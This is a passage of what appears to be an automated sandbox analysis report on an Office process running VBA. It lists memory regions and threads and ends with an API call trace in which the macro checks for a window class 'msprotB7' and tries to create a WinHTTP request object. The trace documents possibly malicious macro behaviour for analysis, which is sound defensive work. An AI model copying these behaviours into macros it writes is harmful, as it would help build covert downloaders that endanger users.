name = "private_0x0000000009250000"
filename = ""
Region:
id = 945
start_va = 0x89c0000
end_va = 0x89c3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089c0000"
filename = ""
Region:
id = 946
start_va = 0x8f70000
end_va = 0x8f71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f70000"
filename = ""
Region:
id = 947
start_va = 0x8f80000
end_va = 0x8f85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f80000"
filename = ""
Region:
id = 948
start_va = 0x9280000
end_va = 0x9285fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009280000"
filename = ""
Region:
id = 949
start_va = 0x9e90000
end_va = 0x9f0bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009e90000"
filename = ""
Region:
id = 950
start_va = 0xa260000
end_va = 0xa2abfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a260000"
filename = ""
Region:
id = 951
start_va = 0xa510000
end_va = 0xa55bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a510000"
filename = ""
Region:
id = 952
start_va = 0xa580000
end_va = 0xa5fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a580000"
filename = ""
Region:
id = 953
start_va = 0xa6a0000
end_va = 0xa6ebfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6a0000"
filename = ""
Region:
id = 954
start_va = 0xaa00000
end_va = 0xaa7afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000aa00000"
filename = ""
Region:
id = 955
start_va = 0x18190000
end_va = 0x1829bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 956
start_va = 0x184b0000
end_va = 0x185bafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000184b0000"
filename = ""
Region:
id = 957
start_va = 0x185c0000
end_va = 0x1958ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000185c0000"
filename = ""
Region:
id = 958
start_va = 0x8730000
end_va = 0x8732fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 959
start_va = 0xfc70000
end_va = 0xfe52fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 960
start_va = 0xfc70000
end_va = 0x10088fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 961
start_va = 0x8730000
end_va = 0x8731fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 962
start_va = 0x87f0000
end_va = 0x87f1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 963
start_va = 0x89b0000
end_va = 0x89b2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089b0000"
filename = ""
Region:
id = 964
start_va = 0x89c0000
end_va = 0x89c1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000089c0000"
filename = ""
Region:
id = 965
start_va = 0x8e00000
end_va = 0x8e03fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e00000"
filename = ""
Region:
id = 966
start_va = 0x8e10000
end_va = 0x8e11fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e10000"
filename = ""
Region:
id = 967
start_va = 0x8e20000
end_va = 0x8e23fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e20000"
filename = ""
Region:
id = 968
start_va = 0x8e40000
end_va = 0x8e43fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e40000"
filename = ""
Region:
id = 969
start_va = 0x8e50000
end_va = 0x8e53fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e50000"
filename = ""
Region:
id = 970
start_va = 0x8f70000
end_va = 0x8f86fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f70000"
filename = ""
Region:
id = 971
start_va = 0x91d0000
end_va = 0x91e6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 972
start_va = 0x8e60000
end_va = 0x8e62fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008e60000"
filename = ""
Region:
id = 973
start_va = 0x91f0000
end_va = 0x91f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091f0000"
filename = ""
Region:
id = 974
start_va = 0x9200000
end_va = 0x9201fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009200000"
filename = ""
Region:
id = 975
start_va = 0x9210000
end_va = 0x9213fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009210000"
filename = ""
Region:
id = 976
start_va = 0x9220000
end_va = 0x9223fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009220000"
filename = ""
Region:
id = 977
start_va = 0x9230000
end_va = 0x9232fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009230000"
filename = ""
Region:
id = 978
start_va = 0x9240000
end_va = 0x9240fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009240000"
filename = ""
Region:
id = 979
start_va = 0x9250000
end_va = 0x9252fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009250000"
filename = ""
Region:
id = 980
start_va = 0x9260000
end_va = 0x9260fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009260000"
filename = ""
Region:
id = 981
start_va = 0x9270000
end_va = 0x9272fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009270000"
filename = ""
Region:
id = 982
start_va = 0x9280000
end_va = 0x9280fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009280000"
filename = ""
Region:
id = 983
start_va = 0xfc70000
end_va = 0xfff9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000fc70000"
filename = ""
Region:
id = 984
start_va = 0x7fef3f70000
end_va = 0x7fef3fdafff
monitored = 0
entry_point = 0x7fef3f7101c
region_type = mapped_file
name = "photometadatahandler.dll"
filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll")
Region:
id = 985
start_va = 0x7fef2910000
end_va = 0x7fef2a7ffff
monitored = 0
entry_point = 0x7fef2a43158
region_type = mapped_file
name = "msptls.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\msptls.dll")
Region:
id = 986
start_va = 0x91d0000
end_va = 0x9217fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 987
start_va = 0xaa00000
end_va = 0xaac6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calibri.ttf"
filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf")
Region:
id = 988
start_va = 0x8730000
end_va = 0x873ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008730000"
filename = ""
Region:
id = 989
start_va = 0x87f0000
end_va = 0x87fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 990
start_va = 0x87f0000
end_va = 0x87fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000087f0000"
filename = ""
Region:
id = 991
start_va = 0x91d0000
end_va = 0x920ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 992
start_va = 0x7fefa290000
end_va = 0x7fefa300fff
monitored = 0
entry_point = 0x7fefa291010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 993
start_va = 0x7fefa220000
end_va = 0x7fefa283fff
monitored = 0
entry_point = 0x7fefa221254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 994
start_va = 0x7fefb2c0000
end_va = 0x7fefb2e6fff
monitored = 0
entry_point = 0x7fefb2c98bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 995
start_va = 0x7fefb2b0000
end_va = 0x7fefb2bafff
monitored = 0
entry_point = 0x7fefb2b1198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 996
start_va = 0x7fefac70000
end_va = 0x7fefac80fff
monitored = 0
entry_point = 0x7fefac716ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 997
start_va = 0x7fefac50000
end_va = 0x7fefac67fff
monitored = 0
entry_point = 0x7fefac51bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 998
start_va = 0x7fefccc0000
end_va = 0x7fefccc9fff
monitored = 0
entry_point = 0x7fefccc3cb8
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 999
start_va = 0x7fefd060000
end_va = 0x7fefd0b4fff
monitored = 0
entry_point = 0x7fefd061054
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1000
start_va = 0x7fefca60000
end_va = 0x7fefca66fff
monitored = 0
entry_point = 0x7fefca614b0
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1001
start_va = 0x7fefd050000
end_va = 0x7fefd056fff
monitored = 0
entry_point = 0x7fefd05142c
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1002
start_va = 0x5350000
end_va = 0x5357fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "urlmon.dll.mui"
filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui")
Region:
id = 1003
start_va = 0x5360000
end_va = 0x5361fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005360000"
filename = ""
Region:
id = 1004
start_va = 0x5370000
end_va = 0x537ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 1005
start_va = 0x5380000
end_va = 0x5387fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 1006
start_va = 0x5390000
end_va = 0x539ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 1007
start_va = 0x7fefcee0000
end_va = 0x7fefcf3afff
monitored = 0
entry_point = 0x7fefcee6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1008
start_va = 0x53a0000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000053a0000"
filename = ""
Region:
id = 1009
start_va = 0x7fef6550000
end_va = 0x7fef65b1fff
monitored = 0
entry_point = 0x7fef6551198
region_type = mapped_file
name = "rasapi32.dll"
filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")
Region:
id = 1010
start_va = 0x7fef6c10000
end_va = 0x7fef6c2bfff
monitored = 0
entry_point = 0x7fef6c111a0
region_type = mapped_file
name = "rasman.dll"
filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")
Region:
id = 1011
start_va = 0x7fefb880000
end_va = 0x7fefb890fff
monitored = 0
entry_point = 0x7fefb8814c0
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1012
start_va = 0x195a0000
end_va = 0x1969ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000195a0000"
filename = ""
Region:
id = 1013
start_va = 0x7fef6cb0000
end_va = 0x7fef6cb8fff
monitored = 0
entry_point = 0x7fef6cb14b4
region_type = mapped_file
name = "sensapi.dll"
filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll")
Region:
id = 1014
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 1015
start_va = 0x91d0000
end_va = 0x927ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000091d0000"
filename = ""
Region:
id = 1016
start_va = 0x18190000
end_va = 0x1830ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 1017
start_va = 0x7fefa770000
end_va = 0x7fefa777fff
monitored = 0
entry_point = 0x7fefa771414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1018
start_va = 0x7fefaca0000
end_va = 0x7fefacf2fff
monitored = 0
entry_point = 0x7fefaca2b98
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1019
start_va = 0x18190000
end_va = 0x1828ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000018190000"
filename = ""
Region:
id = 1020
start_va = 0x7fefce50000
end_va = 0x7fefcea6fff
monitored = 0
entry_point = 0x7fefce55e38
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 1021
start_va = 0x7fef2f50000
end_va = 0x7fef306efff
monitored = 0
entry_point = 0x7fef2f51048
region_type = mapped_file
name = "webservices.dll"
filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll")
Region:
id = 1022
start_va = 0x184b0000
end_va = 0x185affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000184b0000"
filename = ""
Region:
id = 1023
start_va = 0xa2f0000
end_va = 0xa3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a2f0000"
filename = ""
Region:
id = 1024
start_va = 0x21f0000
end_va = 0x21f2fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 1025
start_va = 0x2200000
end_va = 0x2200fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1026
start_va = 0xa6c0000
end_va = 0xa7bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6c0000"
filename = ""
Region:
id = 1027
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 1028
start_va = 0x21f0000
end_va = 0x21f1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 1029
start_va = 0x7fefd260000
end_va = 0x7fefd2affff
monitored = 0
entry_point = 0x7fefd2611e0
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 1030
start_va = 0x2200000
end_va = 0x2209fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "crypt32.dll.mui"
filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui")
Region:
id = 1031
start_va = 0x4cd0000
end_va = 0x4dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 1032
start_va = 0x7fefcb70000
end_va = 0x7fefcb8dfff
monitored = 0
entry_point = 0x7fefcb713b8
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1033
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 1034
start_va = 0x7fefcb50000
end_va = 0x7fefcb6afff
monitored = 0
entry_point = 0x7fefcb52068
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1035
start_va = 0xab30000
end_va = 0xac2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000ab30000"
filename = ""
Region:
id = 1036
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 1037
start_va = 0x7fefa5a0000
end_va = 0x7fefa5c6fff
monitored = 0
entry_point = 0x7fefa5a1098
region_type = mapped_file
name = "cryptnet.dll"
filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll")
Region:
id = 1038
start_va = 0xb060000
end_va = 0xb15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b060000"
filename = ""
Region:
id = 1039
start_va = 0x7fef3b60000
end_va = 0x7fef3b7afff
monitored = 0
entry_point = 0x7fef3b61198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 1040
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 1041
start_va = 0x7fefcb90000
end_va = 0x7fefcba1fff
monitored = 0
entry_point = 0x7fefcb91060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 1086
start_va = 0x2210000
end_va = 0x2229fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002210000"
filename = ""
Region:
id = 1104
start_va = 0x21f0000
end_va = 0x21f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000021f0000"
filename = ""
Region:
id = 1105
start_va = 0x2230000
end_va = 0x2254fff
monitored = 0
entry_point = 0x22ff400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 1106
start_va = 0x7fee6450000
end_va = 0x7fee697afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "vbeuires.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUIRES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeuires.dll")
Region:
id = 1107
start_va = 0x7fef78a0000
end_va = 0x7fef7aa8fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "vbeuiintl.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033\\VBEUIINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbeuiintl.dll")
Region:
id = 1108
start_va = 0x2260000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002260000"
filename = ""
Region:
id = 1109
start_va = 0x2270000
end_va = 0x2270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002270000"
filename = ""
Region:
id = 1110
start_va = 0x2280000
end_va = 0x2289fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vbe6ext.olb"
filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\VBA\\VBA6\\VBE6EXT.OLB" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\vba\\vba6\\vbe6ext.olb")
Region:
id = 1111
start_va = 0x7fef49e0000
end_va = 0x7fef4b77fff
monitored = 0
entry_point = 0x7fef4aaf400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 1112
start_va = 0x8f70000
end_va = 0x8feffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008f70000"
filename = ""
Region:
id = 1113
start_va = 0x196a0000
end_va = 0x1989ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000196a0000"
filename = ""
Region:
id = 1114
start_va = 0x7fefb280000
end_va = 0x7fefb287fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fm20enu.dll"
filename = "\\Windows\\System32\\FM20ENU.DLL" (normalized: "c:\\windows\\system32\\fm20enu.dll")
Region:
id = 1115
start_va = 0x8ff0000
end_va = 0x906ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "~df0380f25336733cd6.tmp"
filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DF0380F25336733CD6.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~df0380f25336733cd6.tmp")
Region:
id = 1116
start_va = 0x7fef7880000
end_va = 0x7fef7898fff
monitored = 0
entry_point = 0x7fef7892830
region_type = mapped_file
name = "asycfilt.dll"
filename = "\\Windows\\System32\\asycfilt.dll" (normalized: "c:\\windows\\system32\\asycfilt.dll")
Region:
id = 1117
start_va = 0x198a0000
end_va = 0x19d8cfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000198a0000"
filename = ""
Region:
id = 1118
start_va = 0x2290000
end_va = 0x2292fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002290000"
filename = ""
Region:
id = 1119
start_va = 0x22a0000
end_va = 0x22aafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022a0000"
filename = ""
Region:
id = 1120
start_va = 0x22b0000
end_va = 0x22d8fff
monitored = 0
entry_point = 0x237f400
region_type = mapped_file
name = "fm20.dll"
filename = "\\Windows\\System32\\FM20.DLL" (normalized: "c:\\windows\\system32\\fm20.dll")
Region:
id = 1121
start_va = 0x22e0000
end_va = 0x22e3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 1122
start_va = 0x53a0000
end_va = 0x53a7fff
monitored = 1
entry_point = 0x55033cc
region_type = mapped_file
name = "vbe7.dll"
filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common~1\\micros~1\\vba\\vba7.1\\vbe7.dll")
Region:
id = 1123
start_va = 0x53d0000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000053d0000"
filename = ""
Region:
id = 1124
start_va = 0x8e00000
end_va = 0x8e25fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "msforms.exd"
filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\VBE\\MSForms.exd" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\vbe\\msforms.exd")
Region:
id = 1125
start_va = 0x2230000
end_va = 0x2246fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 1126
start_va = 0x2250000
end_va = 0x2252fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002250000"
filename = ""
Region:
id = 1127
start_va = 0x2290000
end_va = 0x2290fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002290000"
filename = ""
Region:
id = 1128
start_va = 0x2230000
end_va = 0x2231fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002230000"
filename = ""
Region:
id = 1129
start_va = 0x2240000
end_va = 0x2241fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002240000"
filename = ""
Region:
id = 1130
start_va = 0x2250000
end_va = 0x2251fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002250000"
filename = ""
Thread:
id = 1
os_tid = 0xec4
Thread:
id = 2
os_tid = 0xec0
Thread:
id = 3
os_tid = 0xebc
Thread:
id = 4
os_tid = 0xeb8
Thread:
id = 5
os_tid = 0xeb0
Thread:
id = 6
os_tid = 0xea8
Thread:
id = 7
os_tid = 0xea4
Thread:
id = 8
os_tid = 0xea0
Thread:
id = 9
os_tid = 0xe9c
Thread:
id = 10
os_tid = 0xe98
Thread:
id = 11
os_tid = 0xe74
Thread:
id = 12
os_tid = 0xe70
Thread:
id = 13
os_tid = 0xe6c
Thread:
id = 14
os_tid = 0xe68
Thread:
id = 15
os_tid = 0xe64
Thread:
id = 16
os_tid = 0xe60
Thread:
id = 17
os_tid = 0xe5c
Thread:
id = 18
os_tid = 0xe58
Thread:
id = 19
os_tid = 0xe54
Thread:
id = 20
os_tid = 0xe50
Thread:
id = 21
os_tid = 0xe4c
Thread:
id = 22
os_tid = 0xe48
[0212.635] DispCallFunc (pvInstance=0x0, oVft=0x70d9ebc, cc=0x4, vtReturn=0x0, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x15e1b0) returned 0x0
[0212.655] memcpy (in: _Dst=0x1086f010, _Src=0x3d5698, _Size=0x20 | out: _Dst=0x1086f010) returned 0x1086f010
[0212.655] SafeArrayAllocData (psa=0x1086f010) returned 0x0
[0212.656] memcpy (in: _Dst=0x1086efe8, _Src=0x3d56f8, _Size=0x20 | out: _Dst=0x1086efe8) returned 0x1086efe8
[0212.656] SafeArrayAllocData (psa=0x1086efe8) returned 0x0
[0212.656] memcpy (in: _Dst=0x1086efc0, _Src=0x3d574c, _Size=0x20 | out: _Dst=0x1086efc0) returned 0x1086efc0
[0212.656] SafeArrayAllocData (psa=0x1086efc0) returned 0x0
[0212.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7fef40f1498, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x15dc90 | out: lpThreadId=0x15dc90*=0xef8) returned 0x860
[0212.668] PeekMessageA (in: lpMsg=0x15dc30, hWnd=0x40418, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x15dc30) returned 0
[0212.668] GetActiveWindow () returned 0x30434
[0212.670] SysStringLen (param_1="msprotB7") returned 0x8
[0212.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0212.670] SysStringLen (param_1="msprotB7") returned 0x8
[0212.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="msprotB7", cchWideChar=9, lpMultiByteStr=0x10ad0b88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msprotB7", lpUsedDefaultChar=0x0) returned 9
[0212.670] SetErrorMode (uMode=0x8001) returned 0x8001
[0212.671] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1
[0212.671] LoadLibraryA (lpLibFileName="user32") returned 0x77780000
[0212.671] DeactivateActCtx (dwFlags=0x0, ulCookie=0x113dc79800000fae) returned 1
[0212.672] SetErrorMode (uMode=0x8001) returned 0x8001
[0212.672] GetProcAddress (hModule=0x77780000, lpProcName="FindWindowA") returned 0x777a8270
[0212.672] FindWindowA (lpClassName="msprotB7", lpWindowName=0x0) returned 0x0
[0212.673] GetLastError () returned 0x0
[0212.674] CLSIDFromProgIDEx (in: lpszProgID="WinHTTP.WinHTTPrequest.5", lpclsid=0x15db98 | out: lpclsid=0x15db98*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3
[0212.687] CreateBindCtx (in: reserved=0x0, ppbc=0x15dae8 | out: ppbc=0x15dae8*=0x6fae180) returned 0x0
